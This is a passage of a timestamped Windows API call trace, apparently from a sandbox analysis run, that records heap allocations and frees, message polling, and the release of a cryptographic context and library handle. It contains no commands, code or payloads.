dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0265.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0265.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516a0 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0265.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0265.883] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.883] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.883] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0265.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0265.883] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0265.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0265.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.884] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.884] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0265.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.886] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0265.886] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0265.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.886] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0265.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69be8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0265.886] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0265.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0265.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0265.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0265.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0265.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0265.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0265.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0265.888] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0265.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0265.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.889] FreeLibrary (hLibModule=0x756e0000) returned 1 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0265.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0265.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0265.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0265.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0265.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0265.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0265.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0265.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0265.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0265.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516a0 [0265.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0265.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.890] CloseHandle (hObject=0x2d0) returned 1 [0265.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0265.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0265.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0265.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0265.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0265.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0265.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0265.941] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0265.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0265.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0265.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0265.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.941] CloseHandle (hObject=0x2a0) returned 1 [0265.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0265.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0265.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0265.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0265.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0265.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0265.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0265.946] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0265.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0265.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0265.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0265.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0265.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0265.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0265.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0265.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0265.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0265.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 